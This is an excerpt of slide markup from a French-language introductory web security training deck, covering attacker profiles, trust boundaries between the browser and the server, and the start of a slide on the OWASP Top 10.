      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1737360" y="3886200"/>
            <a:ext cx="1828800" cy="41148"/>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737360" y="4114800"/>
            <a:ext cx="8686800" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="64748B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Labs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1737360" y="4407408"/>
            <a:ext cx="8686800" cy="329184"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://github.com/Dercetech/training-secu-5d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188720" y="1005840"/>
            <a:ext cx="9601200" cy="731520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>La sécurité n’est pas un module optionnel.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1188720" y="1828800"/>
            <a:ext cx="9601200" cy="1005840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1700" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>C’est ce qui empêche votre application de devenir le prochain incident dont on parle sur LinkedIn le lundi matin.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1188720" y="2926080"/>
            <a:ext cx="1645920" cy="4572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88720" y="3154680"/>
            <a:ext cx="9601200" cy="2194560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>On ne construit pas un château fort.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>On décide où on fait confiance, et où on ne fait plus confiance.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>C’est le threat model.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6309360" cy="292608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>01</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="877824"/>
            <a:ext cx="6309360" cy="420624"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Qui attaque, et pourquoi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1371600"/>
            <a:ext cx="63093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481328"/>
            <a:ext cx="6309360" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1500" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>L’attaquant n’est presque jamais un génie en sweat à capuche dans un film.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rounded Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="2011680"/>
            <a:ext cx="6309360" cy="493776"/>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005840" y="2011680"/>
            <a:ext cx="64008" cy="493776"/>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325880" y="2066544"/>
            <a:ext cx="5852160" cy="420623"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1500" b="0">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>un script kiddie qui lance des outils tout faits</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rounded Rectangle 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="2578608"/>
            <a:ext cx="6309360" cy="493776"/>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05840" y="2578608"/>
            <a:ext cx="64008" cy="493776"/>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325880" y="2633472"/>
            <a:ext cx="5852160" cy="420623"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1500" b="0">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>un bot qui scanne Internet en permanence</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rounded Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="3145536"/>
            <a:ext cx="6309360" cy="493776"/>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145536"/>
            <a:ext cx="64008" cy="493776"/>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200400"/>
            <a:ext cx="5852160" cy="420623"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1500" b="0">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>un concurrent peu scrupuleux</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Rounded Rectangle 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="3712464"/>
            <a:ext cx="6309360" cy="493776"/>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3712464"/>
            <a:ext cx="64008" cy="493776"/>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3767328"/>
            <a:ext cx="5852160" cy="420623"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1500" b="0">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ou un employé qui a cliqué sur le mauvais lien</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="TextBox 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="4370832"/>
            <a:ext cx="6309360" cy="640080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Ce qu’il veut : des données, de l’accès, de l’argent, ou casser. Ce qu’il peut faire dépend de ce que vous avez laissé accessible.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31" name="Picture 30" descr="hoodie-hacker.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8069947" y="1417320"/>
            <a:ext cx="2468145" cy="429768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40080"/>
            <a:ext cx="5120640" cy="256032"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>02</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="932688"/>
            <a:ext cx="5120640" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Trust boundary (frontière de confiance)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="1444752"/>
            <a:ext cx="51206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627632"/>
            <a:ext cx="5120640" cy="640080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Tout ce qui est de l’autre côté de la trust boundary est hostile jusqu’à preuve du contraire.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1188720" y="2286000"/>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Navigateur de l’utilisateur</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4158691" y="2286000"/>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  hostile</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1188720" y="2706624"/>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Contenu d’un formulaire</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4158691" y="2706624"/>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  hostile</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1188720" y="3127248"/>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Paramètre d’URL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4158691" y="3127248"/>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  hostile</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1188720" y="3547872"/>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Token envoyé par le client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4158691" y="3547872"/>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  hostile jusqu’à vérification</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1188720" y="3968496"/>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Base de données (isolée)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4158691" y="3968496"/>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  de confiance</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1188720" y="4389120"/>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Code serveur (entrées validées)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="TextBox 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4158691" y="4389120"/>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  de confiance</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="TextBox 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="4864607"/>
            <a:ext cx="5120640" cy="640080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1300" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>La plupart des failles graves arrivent quand on traite quelque chose d’hostile comme s’il était de confiance.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Rounded Rectangle 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6537960" y="1051560"/>
            <a:ext cx="1991563" cy="4434840"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FEF2F2"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="FECA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702552" y="1371600"/>
            <a:ext cx="1810512" cy="256032"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="DC2626"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>HOSTILE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="TextBox 32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6702552" y="1691640"/>
            <a:ext cx="1810512" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Navigateur</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="TextBox 33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6702552" y="2148840"/>
            <a:ext cx="1810512" cy="731520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="64748B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>DOM · cookies · JS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Rounded Rectangle 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9072676" y="1051560"/>
            <a:ext cx="1991563" cy="4434840"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EFF6FF"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="BFDB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237268" y="1371600"/>
            <a:ext cx="1810512" cy="256032"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>DE CONFIANCE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="TextBox 36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9237268" y="1691640"/>
            <a:ext cx="1810512" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Serveur</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="TextBox 37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9237268" y="2148840"/>
            <a:ext cx="1810512" cy="731520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="64748B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>après validation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="TextBox 38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8348472" y="2914192"/>
            <a:ext cx="905256" cy="731520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>trust
boundary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03</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OWASP : une carte, pas une religion</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3832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OWASP (Open Worldwide Application Security Project) publie le Top 10 des risques les plus courants.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
